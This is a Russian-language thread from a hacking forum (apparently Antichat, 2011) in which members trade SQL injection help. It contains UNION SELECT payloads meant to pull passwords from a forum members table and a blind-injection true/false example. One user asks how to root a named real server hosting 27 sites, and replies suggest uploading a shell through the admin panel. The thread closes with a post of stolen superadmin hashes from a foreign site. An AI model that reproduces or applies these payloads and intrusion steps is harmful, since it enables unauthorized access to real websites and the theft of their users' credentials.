 |
|
12.01.2011, 19:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
mysql 5 версия
Сообщение от None
-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_membe rs+--+
выводимые поля 2 и 3
не выводит
Сообщение от None
-1+union+Select+1,password,3,4,5,6,7+from+table1.ib f_members+--+
не выводит
Сообщение от None
-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+fr om+table1.ibf_members+--+
Сообщение от None
-1+union+Select+1,aes_decrypt(aes_encrypt(password) ),3,4,5,6,7+from+table1.ibf_members+--+
тоже не выводит
group_concat, concat пробовал
из другой любой кроме ibf_members выводит данные, как обойти? |
|
|
12.01.2011, 20:00
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
мб написать count(password) и увидеть 0? если всё таки с group_concat не прокатило
|
|
|
|
13.01.2011, 02:05
|
|
Новичок
Регистрация: 10.01.2011
Сообщений: 2
С нами:
8072246
Репутация:
0
|
|
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
|
|
|
|
13.01.2011, 02:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Modex
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
я так понимаю что шeлл у тебя там есть , если ты предлагаешь порутать , и если порутать то давай в студию uname -a
|
|
|
|
13.01.2011, 02:23
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Modex
Есть сайтик, на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
Через админку заливайся, раз прав нет.
Как зальешься, тебе сюда /thread235697.html
|
|
|
|
13.01.2011, 09:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
в SQLI Helper - Blind Dump есть поле Keyword True что оно означает и что нужно туда писать, для Joomla например
|
|
|
|
13.01.2011, 09:36
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
|
|
|
|
13.01.2011, 09:52
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Expl0ited
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
А обязательно в титле брать значени Keyword-а
или можно любое значение которое исчезает на странице?
|
|
|
|
13.01.2011, 10:01
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Необязательно, значение Keyword это выводимые из БД данные
|
|
|
|
13.01.2011, 14:09
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами:
8373596
Репутация:
0
|
|
Вообщем наковырял паролей (хешей),но они все вот такиесайт пакистанский)
superadmin:С/FSс�ЅБvрЛ�ґ�Ј�ѓЊУ�N$Ї
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
